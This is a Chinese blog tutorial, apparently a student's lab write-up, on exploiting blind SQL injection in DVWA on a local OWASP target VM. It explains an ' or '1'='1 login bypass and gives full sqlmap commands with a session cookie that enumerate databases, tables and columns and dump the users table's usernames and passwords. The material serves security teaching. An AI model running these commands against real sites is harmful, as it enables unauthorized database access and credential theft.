利用SQLmap实现 SQL 注入

最新推荐文章于 2024-09-18 15:04:23 发布
最新推荐文章于 2024-09-18 15:04:23 发布
阅读量1.7k 收藏 8
点赞数 2
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LAL07019/article/details/131443811
版权

目录

前言:

1 环境准备

1.开启OWASP靶机和Kali虚拟机

​2.打开火狐浏览器,输入靶机的ip

3.进入靶场,点击Damn选项 

4.kali中登陆dvwa(用户名和密码都是 admin),进入 SQL Injection(Blind)页面,安全等级调为low

2 利用SQLmap实现 SQL 注入案例

1.点击SQL injection(Bind)选项

 2.随意输入一个数字,如将ID输入为:1,然后单击“提交”。在浏览器地址栏复制URL

 3.F12打开开发者工具

4.由于浏览器提交方式为get型

5.为了查看有哪些数据库

6.为了查看有当前数据库

7.为了查看数据库中所有的表

8.为了查看users表中有哪些列

9.爆破表中user和password这两列

 3.总结

前言:

所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。

数据库都是Web应用环境中非常重要的环节。SQL命令就是前端Web和后端数据库之间的接口,使得数据可以传递到Web应用程序,也可以从其中发送出来。需要对这些数据进行控制,保证用户只能得到授权给他的信息。可是,很多Web站点都会利用用户输入的参数动态的生成SQL查询要求,攻击者通过在URL、表格域,或者其他的输入域中输入自己的SQL命令,以此改变查询属性,骗过应用程序,从而可以对数据库进行不受限的访问。

这个语句简单地指明了从user的表中查询用户名和username相等的,并且密码和password相等的。所以,如果用户发送用户名为”admin”,并且密码为”admin”,那么SQL语句被创建如下:

SELECT * FROM user WHERE username='admin' AND password ='admin'

那么,如果用户输入’ or ‘1’=’1,第一个引号会终止输入的字符串,剩下的会被当做SQL语句,并且在SQL语句中1=1恒为真,这就能够绕过注册机制。

SELECT * FROM user WHERE username='admin' AND password =''or '1'='1'。
 

1 环境准备

1.开启OWASP靶机和Kali虚拟机

2.打开火狐浏览器,输入靶机的ip

3.进入靶场,点击Damn选项 

4.kali中登陆dvwa(用户名和密码都是 admin),进入 SQL Injection(Blind)页面,安全等级调为low

 

2 利用SQLmap实现 SQL 注入案例

1.点击SQL injection(Bind)选项

 2.随意输入一个数字,如将ID输入为:1,然后单击“提交”。在浏览器地址栏复制URL

 3.F12打开开发者工具

选中Storage(存储)选项卡,找到cookies,复制其中的PHPSESSID的值(获取cookies,为之后绕过登录页面做准备)

4.由于浏览器提交方式为get型

sqlmap采用-u命令。将刚才复制的URL和COOKIE写入命令:

sqlmap -u "http://192.168.75.135(靶机的ip)/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=52b1g81lsjlabe0355voa05oc7" --batch

(使用sqlmap进行get型注入,cookie用来绕过登录页面)

 可以获取到注入点:

5.为了查看有哪些数据库

发现两个数据库,dvwa和information_schema

输入命令:sqlmap -u "http://192.168.75.135(靶机的ip)/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=52b1g81lsjlabe0355voa05oc7" --batch --dbs

6.为了查看有当前数据库

输入命令:sqlmap -u "http://192.168.75.135(靶机的ip)/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=52b1g81lsjlabe0355voa05oc7" --batch --current-db

7.为了查看数据库中所有的表

输入命令:sqlmap -u "http://192.168.75.135(靶机的ip)/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=52b1g81lsjlabe0355voa05oc7" --batch -D dvwa --tables

8.为了查看users表中有哪些列

输入命令:sqlmap -u "http://192.168.75.135(靶机的ip)/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=52b1g81lsjlabe0355voa05oc7" --batch -D dvwa -T users --columns

9.爆破表中user和password这两列

sqlmap -u "http://192.168.75.135(靶机的ip)/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=52b1g81lsjlabe0355voa05oc7" --batch -D dvwa -T users -C"user,password" --dump

 3.总结

21级计算机网络技术二班黎爱玲
关注
在kali linux里利用SQLmap实现SQL注入
2201_76034619的博客
06-28 6226
安全等级调为low进入SQL Injection(Blind)页面。
sql注入sqlmap使用
m0_71866532的博客
03-23 3237
其中参数“-T”用于指定表名称,“--columns”参数用于指定列出表中字段。#其中参数“-D”用于指定数据库名称,“--tables”参数用于列举表。#其中参数“-C”用于指定字段名称,参数“—dump”用于导出数据。#其中“-r”参数用于指定注入点的导出流量包的绝对路经文件。#,其中参数“--dbs”用于列举数据库。”参数用于指定列出表中字段。”用于指定字段名称,参数“”用于指定数据库名称,“1.打开sqlmap。”用于指定表名称,“
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
最新发布
shanguicsdn111的博客
09-18 1634
提示:SQLmap不能直接「扫描」网站漏洞,先用其他扫描工具扫出注入点,再用SQLmap验证并「利用注入点。检测「post请求」的注入点,使用BP等工具「抓包」,将http请求内容保存到txt文件中。参数,指定需要检测的url,单/双引号包裹。风险级别(0~3,默认1,常用1),级别提高会增加数据被篡改的风险。搜索数据库中是否存在指定库/表/字段,需要指定库名/表名/字段名。就是 all 的意思,获取所有能获取的内容,会消耗很长时间。指定目标「数据库」,单/双引号包裹,常配合其他参数使用。
SQL注入SQLmap入门
Shellcode.Cool!
04-18 912
什么是SQLmapSQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。 读者可以通过位于SourceForge的官方网站下载SQLmap源码:http://sourceforge.net/projects/sqlmap/和http://sqlmap.org/ SQLmap的作者是谁
sqlmap工具的实操--sql注入
weixin_66839513的博客
04-01 3587
sql注入原理就是将恶意的sql语句通过表单或者url拼接到web后端的查询语句中,绕过后端的认证,在后端被服务器执行恶意的sql语句,获取到数据库的权限,从而对数据库进行执行操作,造成数据的篡改及泄露。
sqlmap进行SQL注入
weixin_45095113的博客
03-16 616
sqlmapSQL注入
使用SQLmap进行注入流程
weixin_62715196的博客
08-10 3645
主要讲述SQLmap的主要功能以及对单个目标如何进行注入
sqlmap-sql注入工具
07-06
它的主要功能是检测、利用和管理系统中的SQL注入漏洞,以实现数据窃取、数据库控制甚至服务器接管。这款工具在网络安全研究、渗透测试和漏洞评估领域中广泛应用。 1. **SQL注入原理**: SQL注入是一种常见的网络...
sqlmap sql 注入测试工具
03-06
SQLMap是一款强大的、自动化SQL注入测试工具,专为检测和利用SQL注入漏洞而设计。它可以帮助安全专家或IT从业者在不熟悉目标系统的情况下,轻松发现并利用潜在的SQL注入漏洞,确保系统的安全性。 1. SQL注入简介:...
SQLmap-SQL注入
03-12
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问...
使用sqlmap工具进行sql注入
monkey:的博客
10-27 551
例题 首先我们先来查库名 得知有六个库名 [1] error [2] head_error [3] information_schema [4] kanwolongxia [5] post_error [6] widechar 接着我感觉flag在error库里,所以我开始跑error库的表名 跑出两个表名 ±-----------+ | user | | error_flag | ±-----------+ 然后我们要知道表里的字段,我猜flag在表error_flag中 得出表中字
sqlmapsql注入(二)
m0_55313512的博客
02-27 2720
SQL注入(二)
利用Sqlmap进行SQL注入攻击
m0_62689523的博客
08-14 1883
sqlmap简介 sqlmap是一款基于python编写的渗透测试工具,在sql检测和利用方面功能强大,支持多种数据库。 功能:sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。.........
SQL注入工具介绍——sqlmap
p36273的博客
08-01 1886
1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。4、联合查询注入,可以使用union的情况下的注入。5、堆叠查询注入,可以同时执行多条语句的执行时的注入
sql注入sqlmap(渡栗的学习笔记)
2301_79998006的博客
06-17 1307
sqlmap的使用。Sqlmap是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。目前支持的数据库有MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access等大多数据库
SQL注入sqlmap入门教程
m0_56634355的博客
04-09 9244
sqlmapsql注入必备的也是最常用的工具,是每一位白帽子在的利器之一。
SQLMAP注入教程-11种常见SQLMAP使用方法详解
dfdhxb995397的博客
08-24 4378
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 一共有11种常见SQLmap使用方法:一、SQLMAP用于Access数据库注入(1) 猜解是否能注入 ...
SQL注入Sqlmap使用指南(手把手保姆版)持续更新
记录并分享学习安全的知识点..
03-15 2305
sqlmap 是一款开源的渗透测试工具,可以自动化进行SQL注入的检测、利用,并能接管数据库服务器。它具有功能强大的检测引擎,为渗透测试人员提供了许多专业的功能并且可以进行组合,其中包括数据库指纹识别、数据读取和访问底层文件系统,甚至可以通过带外数据连接的方式执行系统命令。python sqlmap.py -参数,sqlmap可以运行在python2.6、2.7和3.x的任何平台上。
利用sqlmap工具轻松识别网站SQL注入漏洞
首先,课程指出手工进行SQL注入对于初学者来说难度较大,然后介绍sqlmap工具,该工具是一个自动化的SQL注入数据库渗透测试工具,它可以帮助渗透测试人员更方便地发现和利用SQL注入漏洞。 课程内容涵盖了使用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值